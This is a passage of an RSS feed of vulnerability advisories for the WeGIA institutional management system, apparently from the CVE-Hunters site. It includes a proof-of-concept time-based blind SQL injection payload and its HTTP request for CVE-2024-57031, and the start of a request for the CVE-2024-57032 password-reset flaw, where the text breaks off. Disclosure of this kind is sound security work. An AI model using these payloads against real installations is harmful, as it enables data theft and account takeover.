    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2024-57031</title>
        <link>https://www.cvehunters.com/p/cve-2024-57031/</link>
        <guid>https://www.cvehunters.com/p/cve-2024-57031/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2024-57031-sql-injection-blind-time-based-in-remuneracaophp-parameter-id_funcionario&amp;#34;&amp;gt;CVE-2024-57031: SQL Injection (Blind Time-Based) in &amp;lt;code&amp;gt;remuneracao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57031&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57031&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the endpoint &amp;lt;code&amp;gt;/WeGIA/html/funcionario/remuneracao.php&amp;lt;/code&amp;gt;, in the &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; parameter. This vulnerability allows the execution of arbitrary SQL commands, which can compromise the confidentiality, integrity, and availability of stored data.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2024-57031-sql-injection-blind-time-based-in-remuneracaophp-parameter-id_funcionario&amp;#34;&amp;gt;CVE-2024-57031: SQL Injection (Blind Time-Based) in &amp;lt;code&amp;gt;remuneracao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57031&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57031&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was identified in the endpoint &amp;lt;code&amp;gt;/WeGIA/html/funcionario/remuneracao.php&amp;lt;/code&amp;gt;, in the &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; parameter. This vulnerability allows the execution of arbitrary SQL commands, which can compromise the confidentiality, integrity, and availability of stored data.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;request&amp;#34;&amp;gt;Request:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /WeGIA/html/funcionario/remuneracao.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: comfirewall.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga_F8DXBXLV8J=GS1.1.1733313703.4.1.1733316730.35.0.0; _ga=GA1.1.552051356.1730893405; PHPSESSID=702lhluk293h4ap0mv5l51u1g4
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: application/json, text/javascript, */*; q=0.01
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 30
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: https://comfirewall.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://comfirewall.wegia.org:8000/WeGIA/html/funcionario/profile_funcionario.php?id_funcionario=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Te: trailers
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;action=listar&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;id_funcionario=1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Payload:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-sql&amp;#34; data-lang=&amp;#34;sql&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;AND&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;SELECT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;7525&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;FROM&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt; &amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;k&amp;#34;&amp;gt;SELECT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;SLEEP&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;20&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)))&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;PXhT&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;`&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;w&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;normal-request&amp;#34;&amp;gt;Normal Request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57031/image.png&amp;#34;
	width=&amp;#34;1267&amp;#34;
	height=&amp;#34;602&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57031/image_hu_3383898eabf250db.png 480w, /p/cve-2024-57031/image_hu_d81bfee1bac7a32a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;210&amp;#34;
		data-flex-basis=&amp;#34;505px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sql-injection-request&amp;#34;&amp;gt;SQL Injection Request:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2024-57031/image-1.png&amp;#34;
	width=&amp;#34;1266&amp;#34;
	height=&amp;#34;601&amp;#34;
	srcset=&amp;#34;/p/cve-2024-57031/image-1_hu_3e3114a7d1330222.png 480w, /p/cve-2024-57031/image-1_hu_65837b4b2b15e1bf.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;210&amp;#34;
		data-flex-basis=&amp;#34;505px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;references&amp;#34;&amp;gt;References
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/issues/822&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonLazarin/WeGIA/issues/822&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/nilsonmori/WeGIA&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonmori/WeGIA&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 17 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2024-57032</title>
        <link>https://www.cvehunters.com/p/cve-2024-57032/</link>
        <guid>https://www.cvehunters.com/p/cve-2024-57032/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2024-57032-broken-authentication---old-password&amp;#34;&amp;gt;CVE-2024-57032: Broken Authentication - Old Password
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57032&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57032&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A security vulnerability was identified in the web application WeGIA, where it is possible to change a user&amp;#39;s password without verifying the old password. This issue exists in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint and allows unauthorized attackers to bypass authentication and authorization mechanisms to reset the password of any user, including admin accounts.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2024-57032-broken-authentication---old-password&amp;#34;&amp;gt;CVE-2024-57032: Broken Authentication - Old Password
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-57032&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-57032&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A security vulnerability was identified in the web application WeGIA, where it is possible to change a user&amp;#39;s password without verifying the old password. This issue exists in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint and allows unauthorized attackers to bypass authentication and authorization mechanisms to reset the password of any user, including admin accounts.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /WeGIA/controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;HTTP Request Example:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /WeGIA/controle/control.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: comfirewall.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 149
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
